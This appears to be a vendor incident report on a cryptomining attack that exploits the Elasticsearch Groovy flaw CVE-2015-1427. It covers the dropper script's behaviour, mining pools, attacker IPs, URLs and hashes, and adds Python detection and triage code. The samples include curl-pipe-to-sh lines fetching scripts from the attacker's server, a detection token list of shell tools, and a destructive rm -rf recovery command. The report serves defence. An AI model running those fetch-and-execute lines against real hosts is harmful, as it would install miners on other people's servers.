1、Overview
On June 13, 2019, Antiy's Attack Capture System captured an attack exploiting CVE-2015-1427, the Elasticsearch Groovy remote command execution vulnerability. The vulnerability arises because Elasticsearch uses Groovy as a scripting language and relies on a blacklist/whitelist-based sandbox to block dangerous code; the sandbox is not strict enough and can be bypassed, resulting in remote code execution. Antiy conducted a detailed analysis of the samples involved in the incident and gives recommendations for prevention and repair.
2、Sample Analysis
2.1 Critical Payload
Looking at the payload, the attacker uses Groovy as the scripting language and sends a JSON request containing a script to the _search?pretty endpoint. The script references the malicious link http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh, from which a shell script is downloaded and executed, achieving remote code execution and then mining.

Figure 2-1 Data Packet Content
After decryption, the core code is:

Figure 2-2 Core Code
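As an added defensive example (not code from the original report), the following Python function inspects the JSON body of an Elasticsearch _search request for inline scripts and flags Groovy scripts that embed URLs or process-execution tokens, which is the shape of the payload described in section 2.1. The sample request bodies, the indicator token list and the function names are constructed for this example; the sandbox-bypass portion of the real payload is deliberately not reproduced.

```python
import json
import re
from typing import Any, Dict, List

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Tokens that have no business in a search-time scoring script (assumed list).
EXEC_TOKENS = ("Runtime", "ProcessBuilder", ".execute(", "wget", "curl", "/bin/sh", "/bin/bash")


def _collect_scripts(node: Any, path: str, out: List[Dict[str, str]]) -> None:
    """Walk the parsed request and collect every inline script with its language.

    Handles both the 1.x form {"script": "...", "lang": "groovy"} and the object
    form {"script": {"inline": "...", "lang": "groovy"}}.
    """
    if isinstance(node, dict):
        script = node.get("script")
        if isinstance(script, dict):
            code = script.get("inline", script.get("source"))
            lang = script.get("lang", node.get("lang", "default"))
        else:
            code, lang = script, node.get("lang", "default")
        if isinstance(code, str):
            out.append({"path": path, "lang": str(lang), "script": code})
        for key, value in node.items():
            _collect_scripts(value, f"{path}.{key}", out)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _collect_scripts(value, f"{path}[{i}]", out)


def inspect_search_request(body: str) -> Dict[str, Any]:
    """Return the Groovy script count, the indicators found and a verdict.

    verdict: "block"    -> a script carries a URL or an execution token
             "review"   -> Groovy scripts present but no indicators
             "allow"    -> no inline scripts at all
             "unparsed" -> body is not JSON (leave it to the upstream filter)
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return {"groovy_scripts": 0, "indicators": ["body is not valid JSON"], "verdict": "unparsed"}
    scripts: List[Dict[str, str]] = []
    _collect_scripts(doc, "$", scripts)
    groovy = 0
    indicators: List[str] = []
    for entry in scripts:
        if entry["lang"].lower() == "groovy":
            groovy += 1
        indicators += [f"url:{u}" for u in URL_RE.findall(entry["script"])]
        indicators += [f"token:{t}" for t in EXEC_TOKENS if t in entry["script"]]
    verdict = "block" if indicators else ("review" if groovy else "allow")
    return {"groovy_scripts": groovy, "indicators": indicators, "verdict": verdict}


# Constructed sample bodies (not captured traffic). The malicious one mirrors the
# shape described in section 2.1: a groovy script_fields entry pointing at the
# init.sh downloader; the sandbox-bypass code itself is elided.
MALICIOUS_BODY = json.dumps({
    "size": 1,
    "query": {"match_all": {}},
    "script_fields": {"x": {
        "lang": "groovy",
        "script": "/* sandbox bypass elided */ 'curl http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh | sh'",
    }},
})
BENIGN_BODY = json.dumps({
    "query": {"match_all": {}},
    "script_fields": {"doubled": {"lang": "groovy", "script": "doc['price'].value * 2"}},
})

if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY), ("garbage", "{not json")):
        print(name, inspect_search_request(body))
```

A check like this belongs in front of the cluster (reverse proxy or request filter), not inside Elasticsearch; the durable fix for this incident is still to upgrade past the affected 1.x releases and to disable dynamic scripting, since the token list only catches the payload shapes it knows about.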
2.2 Sample Analysis
1) Analysis of Intrusion Script—init.sh
The attacker downloads and executes the malicious script init.sh from http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh to implant the Dog mining program and to perform a series of operations on the host, such as scanning.

Figure 2-3 Turn Off the Firewall
After that, it turns off the firewall, disables SELinux, frees occupied resources, kills other mining-related processes, sets up scheduled tasks (downloading the executable file update.sh every 30 minutes), obtains SSH access, forwards and modifies the iptables rules, and clears the related command history, logs and other traces.

Figure 2-4 Checks and Kills Other Existing Mining Processes

Figure 2-5 Setting the Timed Task

Figure 2-6 Malicious Script Download Address, Backup Address and Size Settings

Figure 2-7 Clearing Related Logs and History
During this process, the script checks whether the three processes sysupdate, networkservice and sysguard are running, and starts them if they are not.

Figure 2-8 When One of Them Is Killed, the Scheduled Task Restarts It
2) Sample Analysis—sysguard, networkservice, sysupdate
The three samples are written in Go and packed with UPX. Their main_main function structures are as follows:

Figure 2-9 The Function Structure of sysguard-main_main

Figure 2-10 The Function Structure of networkservice-main_main

Figure 2-11 sysupdate-main Function
Compared with the previously captured systemctI sample, the attack is found to be divided into three processes: mining, scanning and function calling. Moreover, vulnerability-exploitation and scanning functions are found in the networkservice sample.

Figure 2-12 networkservice Scanning Function
Comparing with the previously captured samples, we find that the attack techniques are similar, except that this attack is carried out jointly by sysguard, networkservice (scanning) and sysupdate. This also means that all three processes should be killed if the server is diagnosed as infected.
3) Configuration File—config.json
In the downloaded configuration file, we find multiple mining pool addresses:
Table 2-1 List of Mining Pools
Mining Pools |
xmr.f2pool.com:13531 |
cryptonightr.in.nicehash.com:3375 |
cryptonightr.br.nicehash.com:3375 |
cryptonightr.hk.nicehash.com:3375 |
cryptonightr.jp.nicehash.com:3375 |
cryptonightr.usa.nicehash.com:3375 |

Figure 2-13 Configuration File
3、Affected Services and Vulnerabilities
Table 3-1 Affected Services and Vulnerabilities
Services | Vulnerabilities |
Weblogic | CVE-2017-10271 |
Thinkphp5 | Remote code execution |
Spring Data Commons | CVE-2018-1273 |
Hadoop | Unauthorized access |
ElasticSearch | CVE-2014-3120 CVE-2015-1427 |
Drupal | CVE-2018-7600 |
Redis | Unauthorized access |
SQL Server | Weak password |
4、IOC
Table 4-1 Attack IP
IP | Geographic Position |
132.145.186.243 | USA |
111.40.10.11 | China - Heilongjiang - Harbin |
167.86.106.102 | USA - Colorado - Littleton |
221.176.156.164 | China - Henan - Kaifeng |
185.181.10.234 | Germany - Hessen - Frankfurt |
Table 4-2 URL
URL |
http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json |
http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice |
http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard |
http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate |
http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh |
https://de.gsearch.com.de/api/config.json |
https://de.gsearch.com.de/api/networkservice |
https://de.gsearch.com.de/api/sysguard |
https://de.gsearch.com.de/api/sysupdate |
https://de.gsearch.com.de/api/update.sh |
http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |
Table 4-3 MD5
MD5 |
09c3dbdb39e1437a40b5c22600b375ca |
8e9957b496a745f5db09b0f963eba74e |
c31038f977f766eeba8415f3ba2c242c |
ff879d31ed80841482c27c90e2bfe268 |
1cc08560de0edb78a9c4a0f1ba664e5f |
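As an added example (not code from the report), the following Python triage helper turns the behaviour described in section 2.2 (cron-based persistence, the three mutually restarting implants, the mining-pool list) and the indicators in the tables of section 4 into checks a responder can run over exported host data: crontab lines, a ps -eo pid,args listing, resolver log lines and file contents. The input samples, function names and log line formats are constructed for this example; the IoC values themselves are the ones listed in Tables 2-1, 4-1, 4-2 and 4-3.

```python
import hashlib
from typing import Dict, List, Tuple

# Indicators copied from Tables 2-1, 4-1, 4-2 and 4-3 of the report.
IOC_FILES = ("config.json", "networkservice", "sysguard", "sysupdate", "update.sh", "init.sh")
IOC_URLS = {f"http://185.181.10.234/E5DB0E07C3D7BE80V520/{f}" for f in IOC_FILES} | {
    f"https://de.gsearch.com.de/api/{f}" for f in IOC_FILES if f != "init.sh"}
IOC_IPS = {"132.145.186.243", "111.40.10.11", "167.86.106.102", "221.176.156.164", "185.181.10.234"}
IOC_MD5 = {
    "09c3dbdb39e1437a40b5c22600b375ca", "8e9957b496a745f5db09b0f963eba74e",
    "c31038f977f766eeba8415f3ba2c242c", "ff879d31ed80841482c27c90e2bfe268",
    "1cc08560de0edb78a9c4a0f1ba664e5f",
}
IOC_PROCESSES = {"sysguard", "networkservice", "sysupdate"}
MINING_POOLS = {
    "xmr.f2pool.com:13531", "cryptonightr.in.nicehash.com:3375",
    "cryptonightr.br.nicehash.com:3375", "cryptonightr.hk.nicehash.com:3375",
    "cryptonightr.jp.nicehash.com:3375", "cryptonightr.usa.nicehash.com:3375",
}
POOL_HOSTS = {pool.rsplit(":", 1)[0] for pool in MINING_POOLS}


def scan_crontab(lines: List[str]) -> List[str]:
    """Return non-comment crontab lines that reference a known download URL or C2 host."""
    hosts = {u.split("/")[2] for u in IOC_URLS} | IOC_IPS
    return [ln for ln in lines if not ln.lstrip().startswith("#")
            and (any(u in ln for u in IOC_URLS) or any(h in ln for h in hosts))]


def scan_process_list(lines: List[str]) -> List[Tuple[int, str]]:
    """Parse 'PID CMD' rows (as from ps -eo pid,args) and return (pid, name) for the implants."""
    hits: List[Tuple[int, str]] = []
    for ln in lines:
        parts = ln.split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue  # header or malformed row
        name = parts[1].split()[0].rsplit("/", 1)[-1]  # basename of the executable
        if name in IOC_PROCESSES:
            hits.append((int(parts[0]), name))
    return hits


def scan_dns_log(lines: List[str]) -> List[str]:
    """Return the mining-pool hostnames from Table 2-1 that appear in resolver log lines."""
    return sorted({host for ln in lines for host in POOL_HOSTS if host in ln})


def md5_is_ioc(data: bytes) -> bool:
    """True if the MD5 of the given file content matches a hash from Table 4-3."""
    return hashlib.md5(data).hexdigest() in IOC_MD5


def triage(crontab: List[str], ps: List[str], dns: List[str]) -> Dict[str, object]:
    """Combine the three scans into one verdict for a host."""
    cron_hits = scan_crontab(crontab)
    proc_hits = scan_process_list(ps)
    dns_hits = scan_dns_log(dns)
    return {
        "cron": cron_hits,
        "processes": proc_hits,
        "dns": dns_hits,
        "infected": bool(cron_hits or proc_hits or dns_hits),
        # Section 2.2: the implants restart each other, so they must be killed at once.
        "kill_together": sorted({name for _, name in proc_hits}),
    }


# Constructed sample inputs (not data from a real host).
SAMPLE_CRONTAB = [
    "# constructed sample crontab",
    "0 2 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "*/30 * * * * curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh | sh",
]
SAMPLE_PS = [
    "  PID CMD",
    "    1 /sbin/init",
    " 2043 /tmp/sysguard",
    " 2044 /tmp/networkservice",
    " 2050 /usr/sbin/sshd -D",
]
SAMPLE_DNS = [
    "client 10.0.0.5#53012: query: xmr.f2pool.com IN A",
    "client 10.0.0.5#53013: query: www.example.com IN A",
]

if __name__ == "__main__":
    print(triage(SAMPLE_CRONTAB, SAMPLE_PS, SAMPLE_DNS))
```

The matching is deliberately plain substring search so it can be read at a glance; on a real host, feed it the output of crontab -l for every user plus /etc/cron.d, and treat a hit in any one category as enough to start the recovery steps in section 5, since the page notes that sysupdate is absent from this sample listing only until the scheduled task restarts it.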
5、Recommendations for Prevention and Repair
Recommendations for Prevention:
a) Ensure that systems and applications regularly download and install the latest official patches;
b) Prohibit the use of weak passwords;
c) Regularly check the server for anomalies, such as continuously high CPU usage and disk exceptions;
d) Install an endpoint threat security product such as the Antiy Intelligent Endpoint Protection System. It can customize an exclusive security baseline for you to create a secure intranet environment. At the same time, with its document security protection function, its whole-network virus fixed-point removal function, and its security protection for domestic operating systems, it can better solve your security problems and protect your server.
Recommendations for Recovery:
a) Disconnect from the network, back up important crontab entries, and stop or delete the scheduled tasks: systemctl stop crontab or rm -rf /etc/cron.d/*;
b) Lock the malicious files referenced in the crontab;
c) Check and kill the virus processes: kill the three processes sysguard, networkservice and sysupdate at the same time;
d) Delete virus-related files;
e) After confirming that nothing is wrong, restart the server, install the vulnerability patch and use the Antiy Intelligent Endpoint Protection System to prevent risk and protect the security of the server.